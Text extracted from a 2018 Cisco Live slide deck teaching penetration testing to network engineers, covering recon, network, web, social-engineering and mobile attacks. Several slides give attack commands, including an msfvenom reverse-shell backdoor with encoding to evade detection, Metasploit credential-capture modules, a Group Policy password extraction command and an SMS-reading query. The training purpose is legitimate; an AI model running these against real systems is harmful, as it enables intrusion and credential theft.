#CLUS Penetration Testing For Network Engineers Know Yourself and Enemy, Need Not Fear 100 Battles
Joseph Muniz – Architect Americas BRKSEC-2460
#CLUS Cisco Webex Teams
Questions? Use Cisco Webex Teams (formerly Cisco Spark) to chat with the speaker after the session How 1 Find this session in the Cisco Events App 2 Click “Join the Discussion” 3 Install Webex Teams or go directly to the team space 4 Enter messages/questions in the team space
Webex Teams will be moderated cs.co/ciscolivebot#BRKSEC-2460 by the speaker until June 18, 2018.
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 3 WHY DO WEFAIL?
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 4 Behind the Headlines
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 5 #CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 6 More than Computer and Phones
500B In 2030 50B In 2020 15B Devices Today
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 7 More than Computer and Phones
500B In 2030 50B In 2020 15B Devices Today
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 8 More than Computer and Phones
500B In 2030 50B In 2020 15B Devices Today
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 9 IoT Challenges
Patch Delays
Limited Security Development Rogue Devices
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 10 #CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 11 #CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 12 Threats Continue
SamSam
Nyetya
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 13 Any Many Get It Wrong
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 14 Any Many Get It Wrong
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 15 Any Many Get It Wrong
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 16 Any Many Get It Wrong
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 17 Any Many Get It Wrong
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 18 Option 1: Hope Others Fix It
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 19 Option 2: Validate What’s Going On
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 20 Agenda • Security Language Defined • Penetration Testing Lab • Testing Concepts • Attacking Websites • Attacking Networks • Attacking People • Attacking Mobile Devices • Attacking IoT • Reporting and Next Steps • Conclusion
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 21 Yeay For Giveaways! #CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 23 #CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 24 Download The CTR Comic
https://www.dropbox.com/s/43qfd9f7p8mk8fm/CTR20- Comic.pdf?dl=0
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 25 Joseph Muniz Technical Security Architect
Security Architect – Americas Sales Organization
Security Researcher –www.thesecurityblogger.com
Speaker: Cisco Live / DEFCON / RSA / (ISC)2
Avid Futbal (Soccer for USA people) Player and Musician
Twitter @SecureBlogger
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 26 Risk Management Cyberattacks Broken Down
• Common Language for Security Professionals • Exploit takes advantage of vulnerability. • Exploits are not malware, malware is malicious software. • Vulnerabilities can be exploited. • A dropper or stage 1 payload comes down to the victim. • A RAT is a Remote Access Toolkit/Trojan.
Takes advantage of To deliver Downloading Objective
Malware Goal RATs Exploit vulnerability Dropper/ Rootkit Payload
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 28 Cyberattacks Broken Down
• Common Language for Security Professionals • Exploit takes advantage of vulnerability. • Exploits are not malware, malware is malicious software. • Vulnerabilities can be exploited. • A dropper or stage 1 payload comes down to the victim. • A RAT is a Remote Access Toolkit/Trojan.
Takes advantage of To deliver Downloading Objective
Malware Goal RATs Exploit vulnerability Dropper/ Rootkit Payload
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 29 Cyberattacks Broken Down
• Common Language for Security Professionals • Exploit takes advantage of vulnerability. • Exploits are not malware, malware is malicious software. • Vulnerabilities can be exploited. • A dropper or stage 1 payload comes down to the victim. • A RAT is a Remote Access Toolkit/Trojan.
Takes advantage of To deliver Downloading Objective
Malware Goal RATs Exploit vulnerability Dropper/ Rootkit Payload
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 30 Cyberattacks Broken Down
• Common Language for Security Professionals • Exploit takes advantage of vulnerability. • Exploits are not malware, malware is malicious software. • Vulnerabilities can be exploited. • A dropper or stage 1 payload comes down to the victim. • A RAT is a Remote Access Toolkit/Trojan.
Takes advantage of To deliver Downloading Objective
Malware Goal RATs Exploit vulnerability Dropper/ Rootkit Payload
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 31 Not a Penetration Test
• Risk Management – Dealing with any type of risk • Vulnerability Management – Dealing with vulnerabilities • Incident Response – Responding to attacks • Audit – Checking for compliance • Digital Forensics – Investigating breaches / legal needs • Hacking – Unlocking features / creating new capabilities
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 32 Audit – Specific thing like compliance
Assessment – Automated tools looking for vulnerabilities
Pentest – Testing vulnerabilities using real exploitation
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 33 Compliance
• Legal or Business • Should be minimal security • SOC enforces and reports • Customized dashboards can help!
AIM for going beyond compliance
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 34 Why First Perform a Vulnerability Assessment Before Pentest?
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 35 Assessment vs Penetration Test
. Assessment – Using automated systems to identify potential vulnerabilities . Penetration Test – Executing attacks against identified vulnerabilities
Assessment is good to see your weaknesses Penetration Testing is good if you know you are secure
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 36 Common Vulnerabilities and Exposures (CVE)
Vulnerability Type: Apache vulnerability Threat Description: Three vulnerabilities in the Apache Struts 2 package Existing Controls: Firewalled and monitored by IPS Probability: Unlikely (not web facing) Impact: Critical http://cve.mitre.org/about/faqs.html
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 37 Vulnerability Assessment Results
Challenges
• May not be real • Hard to execute • Not accessible • Critical or not? • Specific requirements
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 38 How to Prioritize Risk - COBIT
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 39 Vulnerability Management Current State
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 40 Security is a Journey, Not a destination
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 41 SANS - Vulnerability Management
• NAC and Profiling can help with Asset Inventory
• Triggers • CVE Identifier may trigger event • Assessment tools • Audits
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 42 Risk Management Best Practice Summary
• Automate Network Access • Continuously Assess for vulnerabilities • Develop Risk Rating Strategy • Automate Enforcement (if possible) • Enforce Posture Upon Connection • Enforce Patch Management • Subscribe and Follow Researchers • Don’t Trust Everything You Hear
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 43 Penetration Testing Penetration Testing Starting Points
White Box Grey Box Black Box
• Know target details • Some details • No details • Topology given • Some topology • Unknown topology • Informed parties • Limited awareness • No awareness • Limited attacks • Many attacks • Any attack
Very specific work Hybrid work Attack Anyway Possible
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 45 Penetration Testing Services
• Internal teams typically perform White Box • Grey Box is typically the best value • Black Box can give interesting results and most realistic • Reconnaissance is typically the most costly service
Work must be properly authorized!
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 46 Statement of Work
• Define target systems • Risks / Critical • Timeframe Operation Areas • Evaluation methods • Target space • Tools and Software • Define flag • Notified parties • Deliverable • Initial access level • Expected remediation • Authorization • Assumptions
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 47 Risks
• Legal rights to perform the test • Systems could be harmed • Alarms could be triggered • Problems will likely be found, now you know and must deal with them • Boundaries need to be established
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 48 Get out of Jail Card
• Authorization in writing • Signed by the right person • State risks • Assign liability to stakeholder
Make sure to have this!
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 49 Building A Lab Kali Linux
Open Source Penetration Testing Arsenal Many Great Forensics Tools
Download www.kali.org
Make sure to update Apt-get update Apt-get upgrade
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 51 Metasploit
Penetration testing tool used for executing exploit code against a remote target machine.
Hundreds of exploits available
Search vulnerability and use MSF to deliver a packaged attack against the weakness.
Gain shell access, disrupt target, etc.
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 52 Struts Vulnerability Found
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 53 Struts Vulnerability Found
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 54 Defense Tools are Similar
Search struts in FirepowerWhy can this be bad?
Lots of signatures for struts attacks come up
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 55 Defense Tools are Similar
Note:Search struts Ethical in Firepower Security Venders Don’t Always Tell
Lots of signatures for struts attacks come up
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 56 Sandbox - Cuckoo
https://www.cuckoosandbox.org/
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 57 TrIDNET or PEiD
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 58 VMware
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 59 Vulnerability Scanners
Credential and Non- Credential is Key
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 60 Simple Lab Example
Vmware Fusion Kali USB Internet Option MAC OSX
Kali Linux Windows 200 Gig 7 Mobile Storage
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 61 The Process Attack Kill Chain
Weaponize Deliver Exploit Install Command Action & Control
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 63 Vectors of an Attack
Physical Digital • Intel Gather • Surveil • Scan • Pick • Assess • Force • Exploit • Conceal • Persist • Persist • Propagate Converged • Exfiltrate Attack Converged attacks are most Social effective and most difficult to thwart • Targeted Phishing • Conning Guards/Staff • Impersonation • Phone Phishing • Create Spies
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 64 Physical Attacks
Keyboard Drivers System Backdoor Network Backdoor
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 65 Bashbunny, PacketSquirrel + Rubber Ducky
https://hakshop.com
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 66 USB Script Options
• Poison Tap or Responder – Grab Passwords from Locked windows systems • Reverse SSH – Encrypted tunnel off network • Root Scripts – Gain shell • Many many more …. https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 67 Lock Picking
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 68 Lock Picking
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 69 Door Cards – Proxmark3
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 70 Digital Attacks
NMAP shows Open Ports! Nexpose shows vulnerabilities Metasploit delivers attack
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 71 Digital Attacks
NMAP shows Open Ports! Nexpose shows vulnerabilities Metasploit delivers attack
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 72 Social Attacks
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 73 Social Attacks
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 74 Social Attacks
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 75 Social Attacks
#CLUS © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public Social Attacks
#CLUS © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public Reconnaissance
• Learn everything about target
• 1st step in an attack and most time consuming
• More you know = better attack
• Find quickest and most effective approach
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 78 Reconnaissance Tools
• MASSSCAN / NMAP – Scanners • (RIR) / EDGAR – Registered public info • Profiling – Best guess about endpoint (ex NMAP –A) • Public Data– waybackmachine, Maltigo, Shodan.io • Burp – Communication monitoring • Scanner – Vulnerability searching • Google Maps / Images / etc – Physical layout and social
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 79 #CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 80 Weaponization Build Rootkit
Package With Application Encode until unrecognizable
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 81 Exploitation
Metasploit – Framework for developing and executing exploit code against a remote target machine
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 82 Establishing Foothold
• Obtain access to multiple systems
• If one foothold removed, others available
• Accomplished through exploitation and lateral movement also known as Pivoting
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 83 Command and Control
• Keyboard access to network • Through compromised hosts, systems, etc • Best to NOT show two way display • Sometimes bot network • Blends in with common traffic
Hard to detect!
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 84 #CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 85 Data Exfiltration
• Data removed from network
• Potentially encrypted (reverse SSH)
• Could break up the data
• Send it with sporadic timing
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 86 Attacking Websites Let the attacking begin Web Recon - Shodan.io
92% of Internet devices surveyed were running known vulnerabilities, average of 26 each
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 88 Web Reconnaissance
• Whois – Example [email protected] • Google Hacking – intext: classifed | “this file generated by Nessus” | intitle:index.of inbox dbx • Wayback Machine – Find old versions of website • Robots.txt – Websites they want hidden from spiders • Banners – Free info about the system • DIG – DNS info
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 89 Web Reconnaissance
• Whois – Example [email protected] • Google Hacking – intext: classifed | “this file generated by Nessus” | intitle:index.of inbox dbx • Wayback Machine – Find old versions of website • Robots.txt – Websites they want hidden from spiders • Banners – Free info about the system • DIG – DNS info
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 90 EDGAR and RIR
• ICANN – https://www.icann.org/ • EDGAR – Public company records • Regional Internet Registries (RIR) • USA – www.arin.net/index.html • Asia Pasicfic – http://apnic.net/ • Europe – http://www.ripe.net • Latin America - http://www.lacnic.net • African - https://www.afrinic.net/en/about/service- region
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 91 Interrogate DNS
• Domain information Grouper (DIG) • Mxtoolbox – web tool
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 92 Interrogate DNS (Inside)
Find DSN Suffix in use on the domain • Cat /etc/resolv.conf
Find list of Domain Controllers • Nslookup • set q=SRV • _ldap._tcp.dc._msdcs.
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 93 Target Fingerprinting
• ICMP Port unreachable messages • Banners • Binaries • Port Signatures • Non-standard handshakes • Response to synfloods • Packets with non-standard TCP/IP Flags
Tools like NMAP can do this for you
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 94 Network Mapper NMAP • NMAP • -sP = Network Discovery • -sT = Host Discovery • -sV = Service Interrogation • -sU = UDP scanning • -sA = Map out firewall rulesets (stateful?, Filter ports?) • -sF = Discover closed ports
• Hping3 - Command-line oriented TCP/IP packet assembler/analyzer
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 95 Stealth / Legal
• Completing the handshake could be illegal! • -sT = illegal | -sS = not illegal (not legal advise!)
• Syn Scan – Half open scan for stealth • Add delay (example “--scan_delay 90000”) • Sending ICMP traffic with different types • Response doesn’t matter. Looking for hosts! Save active devices to file cat alive-scan.txt | grep "report for" | awk '{print $5}' | tee alive-IPs.txt
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 96 Open Ports … Now What?
• Determine services/daemons that are running to find exploits! (ex nmap –sV) • Port numbers – www.iana.org/assignments/port-numbers • Ports can run any service! You should interrogate by connecting to it. • Example: telnet to a port 25
Also gather other data like Banners ->
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 97 OWASP Top 10
• Easy to get to, poor security and most vulnerable! • OWASP – Great resource for news and standards
• Cross Site Scripting (XSS) • Information Leakage and Improper Error Handling • Injection Flaws • Broken Authentication and • Malicious File Execution Session Management • Insecure Direct Object • Insecure Cryptographic Storage Reference • Insecure Communications • Cross Site Request Forgery • Failure to Restrict URL Access
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 98 Summarizing Web Testing
One
Three Two
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 99 Attacking Networks Plugging in Networks
• No security = Instant access • Port security = Possible static MAC list • NAC = Need to beat assessment profile • NAC is port driven, try weird ports
Spoofing trusted devices may work
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 101 Hacking SNMP
• Default Community – public / private • Spoof address of manager or devices • Typically won’t notice ”quite” devices • Brute force SNMP authentication • Typically not monitored • SNMP walking – Try strings across multiple systems • SNMP brute force – Run a .txt file of strings • SNMP attacking - Abuse when rw is enabled
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 102 Attacking SNMP
Onesixtyone – Brute Force with text file
Snmpwalk – Test various community strings
Public Exists Private Doesn’t
Change SNMP if RW is enabled! Find it by grep v1
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 103 Viewing Network Data
. Inline – direct real-time live traffic . SPAN port – copy of traffic
PCAP = Historical Live should have filtering (example TCPDump filter on POST) tcp.flags.syn && tcp.flags.ack==0 tcp.flags.syn==1 && tcp.flags.ack==1 = tcp.flags.reset && tcp.flags.ack
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 104 WiFi MiTM
Karma – Ability to clone SSIDs and man-in-the-middle the mobile device
SSL-Strip – Removing HTTPS request so authentication is in the clear.
Defending ????
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 105 WiFi MiTM
Karma – Ability to clone SSIDs and man-in-the-middle the mobile device
SSL-Strip – Removing HTTPS request so authentication is in the clear.
Defending
• VPN • Disable Auto WiFi Connect • WIDS/WIPS • Remove HTTP from critical servers
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 106 How Easy is Getting Wireless MiTM? WiFi Pineapple • Wireless Pretesting Tool • Can Spoof SSID and performan SSL-Strip • Cost: $100 - $200 dollars from hack5
Raspberry Pi • $35 dollar computer • Can host any OS including Kali Linux • Kali Linux offers multiple penetration testing applications
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 107 How Easy is Getting Wireless MiTM? WiFi Pineapple • Wireless Pretesting Tool • Can Spoof SSID and performan SSL-Strip • Cost: $100 - $200 dollars from hack5
Raspberry Pi • $35 dollar computer • Can host any OS including Kali Linux • Kali Linux offers multiple penetration testing applications
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 108 Network MiTM
• Get network traffic through your device • ARP poison • Inline • Proxy (network or host)
PacketSquirrel | Ettercap = Easy Testing
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 109 Targeting User Accounts
• Abuse Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Services (NetBios-NS)
• Both resolve hostnames to IP addresses
• Trick victim to connect to Kali Linux instead of capturing credentials
auxiliary/spoof/llmnr/llmnr_response auxiliary/spoof/nbns/nbns_response auxiliary/server/capture/smb #CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 110 Window - ShareCheck
• Use of non standard local admin accounts • Windows file sharing vulnerabilities • Global groups granted local admin acess • Insecure account lockout
http://www.sec-1.com/blog/2014/sharecheck
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 111 Attack Logging and Time
• Injecting False Information • Wiping logs • Adjusting Timestamps • Word Wrapping – Using white space padding • HTML or Terminal attack
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 112 Exfiltration
• Allow root remote - /etc/ssh/sshd_config, comment out “PermitRootLogin no” • Netcat • Create account on exiting FTP / SSH • Lightweight FTP – BabyFTP | Vsftpd | Mollensoft FTP
Avoid Trojans and Keyloggers – Painful Cleanup!
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 113 Attacking People You can be anybody
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 115 Emily Williams
• Total Connections: 170 Employees, 71 Cisco; 22 NetApp; 10 EMC; 35 McAfee; 300+ Facebook friends
• Endorsements: 22 LinkedIn Endorsements, For Expertise and Experience; From Partners and co- workers
• Offers: 4 job offers, Laptop and office equipment, network access.
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 116 Speak Like Your Target
• Use Facebook and LinkedIN as a weapon • What do you leave on social networks that could be used against you? • Hide attacks in Social Media messages • Read their E-mail / Posts / Etc and learn their language
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 117 Speak Like Your Target
• Use Facebook and LinkedIN as a weapon • What do you leave on social networks that could be used against you? • Hide attacks in Social Media messages
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 118 Speak Like Your Target
• Use Facebook and LinkedIN as a weapon • What do you leave on social networks that could be used against you? • Hide attacks in Social Media messages
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 119 Phishing / Spear Phishing
• Best to customize based on Recon • Tie it to holiday / events • Language is everything! • Goal can be info or cause action
Practice this skill
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 120 Phishing Emails
#CLUS © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public Cisco Phishing Stats
#CLUS © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public Browser Injection Framework (BeEF)
• Hook victim browsers as beachheads for attacks • Social engineer to click customized link • Available attacks depend on current browser vulnerabilities • Can track hooked systems
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 123 #CLUS © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public #CLUS © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public Social Engineering Tool Kit (SET)
• Easily clone a website • Create various phishing attacks • Create payload and listener • Mailer attacks • Powershell attacks • And many many more ….
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 126 #CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 127 Business Email Compromise
Attacker
[email protected]: We have conference dues to pay that are late. Pay at www.hackme.com/dues
Cisco Financial
[email protected]: Ok I’m on it!
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 128 Attacking Exploits Packing Malware 101
Bypass signature based detection
(Un)Packer Frequently Changed
Payload (unpacked malware) Changed Less frequently
Executable
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 130 Encoding 1 – Create Backdoor Metasploit msfvenom -p python/meterpreter/reverse-underscore-tcp LHOST = ANYIP LPORT= ANY PORT R> anyname.py Senna
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 131 Encoding 2 – Decrypt and Add Crap
• Open With Text Editor • Decode with online source https://www.base64decode.org/
Copy Sourcecode Paste and Modify
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 132 Privilege Escalation
• Cpasswords – Group Policy Passwords encrypted but reversible • GP3finder simplifies gp3finder.py -A -t DOMAIN_CONTROLLER -u DOMAINUSER
• Mimikatz – Meterpreter password extraction
• Incognito – Enumerate and impersonate tokens
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 133 Why is Empire / Powershell very effective at bypassing host security (Windows)?
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 134 Empire
• Exploit Framework targeting Windows • Listener – Waits for connection • Stager – Code placed on compromised system • Agent – Maintain connection between you and victim • Run commands in memory. • Antivirus hates this!
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 135 Password Cracking Concepts
• BIOS – Try manufacture password • Guessing or Recovering a password (admin | password | cisco | blank | vender name) • Dictionary / Rainbow Tables • Man-in-the-middle • Attacking encryption
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 136 Lots of Password Cracking Tools
• Brutus - Remote online cracking tool • RainbowCrack - Hash cracker tool, Windows/Linux based • Wfuzz - Web application brute forcing (GET / POST), (SQL, XSS, LDAP,etc) • Cain and Able - Few features of password cracking ability • John the Ripper - Offline mode, auto hash password type detector, • THC Hydra - Dictionary attack tool for many databases, over 30 protocols • AirCrack-NG - WEP and WPA-PSK keys cracking • OphCrack / Medusa / L0phtCrack / Etc. ……
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 137 CeWL
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 138 Passwords
• Windows Password Storage – SAM • SYSKEY – Additional SAM encryption • Linux Password Storage – passwd / shadow • Attacking Active Directory • Local Secuirty Authority (LSA) cached accounts • Microsoft Hashing types
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 139 Attacking Mobile Devices Always Research
• Mobile exploitation constantly changing • New vulnerabilities constantly discovered • Venders are improving patching • Attack tools constantly improving
Attacks are not black and white – TEST!
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 141 Phones: MAC OSX
• Jailbreaking usually older iOS • Attack iTunes Backups • AnyTrans or iPhone Backup Extractor • iOS Snapshots
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 142 Phones: Android
• Older - Connect to like mass storage • Version 6 or later – Encrypted • Root device – KingoRoot • SMS data base /data/data/com.android.providers.telephony/databases/mmssms.db • Script to read SMS SELECT datetime(date/1000, 'unixepoch','localtime') ,datetime(date_sent/1000, 'unixepoch','localtime') ,person,body FROM sms WHERE thread_id = 310 ORDER BY date
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 143 Example Reading SMS
+------+ | date | date_sent | person | body | |------| 2017-10-20 13:48:18 | 2017-10-20 13:48:16 | 54 | Hello Randy! Where should I send my Cisco live presentation? | | 2017-10-20 16:34:03 | 2017-01-01 02:00:00 | | Damn, thanks ! for texting jet | | 2017-10-20 16:40:02 | 2017-10-20 16:40:01 | 54 | Jet? When you are a Jet, you’re a jet? West Side?? | | Stupid auto correct! | I’m going to dropkick you Joey ... And this phone
#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 144 Brute Force PINs
